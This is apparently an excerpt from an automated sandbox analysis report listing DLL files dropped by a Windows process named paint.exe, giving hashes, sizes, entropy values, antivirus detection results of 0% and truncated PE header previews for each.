                                                                                                                                                                                                                                                              SHA-256:27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
                                                                                                                                                                                                                                                              SHA-512:BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                                              MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                                              SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                                              SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                                              SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.834520503429805
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
                                                                                                                                                                                                                                                              MD5:1281E9D1750431D2FE3B480A8175D45C
                                                                                                                                                                                                                                                              SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
                                                                                                                                                                                                                                                              SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
                                                                                                                                                                                                                                                              SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.916367637528538
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
                                                                                                                                                                                                                                                              MD5:FD46C3F6361E79B8616F56B22D935A53
                                                                                                                                                                                                                                                              SHA1:107F488AD966633579D8EC5EB1919541F07532CE
                                                                                                                                                                                                                                                              SHA-256:0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
                                                                                                                                                                                                                                                              SHA-512:3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.829681745003914
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
                                                                                                                                                                                                                                                              MD5:D12403EE11359259BA2B0706E5E5111C
                                                                                                                                                                                                                                                              SHA1:03CC7827A30FD1DEE38665C0CC993B4B533AC138
                                                                                                                                                                                                                                                              SHA-256:F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
                                                                                                                                                                                                                                                              SHA-512:9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.612408827336625
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
                                                                                                                                                                                                                                                              MD5:0F129611A4F1E7752F3671C9AA6EA736
                                                                                                                                                                                                                                                              SHA1:40C07A94045B17DAE8A02C1D2B49301FAD231152
                                                                                                                                                                                                                                                              SHA-256:2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
                                                                                                                                                                                                                                                              SHA-512:6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.918215004381039
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
                                                                                                                                                                                                                                                              MD5:D4FBA5A92D68916EC17104E09D1D9D12
                                                                                                                                                                                                                                                              SHA1:247DBC625B72FFB0BF546B17FB4DE10CAD38D495
                                                                                                                                                                                                                                                              SHA-256:93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
                                                                                                                                                                                                                                                              SHA-512:D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):26216
                                                                                                                                                                                                                                                              Entropy (8bit):4.882777558752248
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
                                                                                                                                                                                                                                                              MD5:EDF71C5C232F5F6EF3849450F2100B54
                                                                                                                                                                                                                                                              SHA1:ED46DA7D59811B566DD438FA1D09C20F5DC493CE
                                                                                                                                                                                                                                                              SHA-256:B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
                                                                                                                                                                                                                                                              SHA-512:481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.738587310329139
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
                                                                                                                                                                                                                                                              MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
                                                                                                                                                                                                                                                              SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
                                                                                                                                                                                                                                                              SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
                                                                                                                                                                                                                                                              SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):5.202163846121633
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
                                                                                                                                                                                                                                                              MD5:5107487B726BDCC7B9F7E4C2FF7F907C
                                                                                                                                                                                                                                                              SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                                              SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                                              SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                                              MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                                              SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                                              SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                                              SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                                              MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                                              SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                                              SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                                              SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):30328
                                                                                                                                                                                                                                                              Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                                              MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                                              SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                                              SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                                              SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                                              MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                                              SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                                              SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                                              SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):26208
                                                                                                                                                                                                                                                              Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                                              MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                                              SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                                              SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                                              SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):26232
                                                                                                                                                                                                                                                              Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                                              MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                                              SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                                              SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                                              SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):26232
                                                                                                                                                                                                                                                              Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                                              MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                                              SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                                              SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                                              SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                                              MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                                              SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                                              SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                                              SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                                              MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                                              SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                                              SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
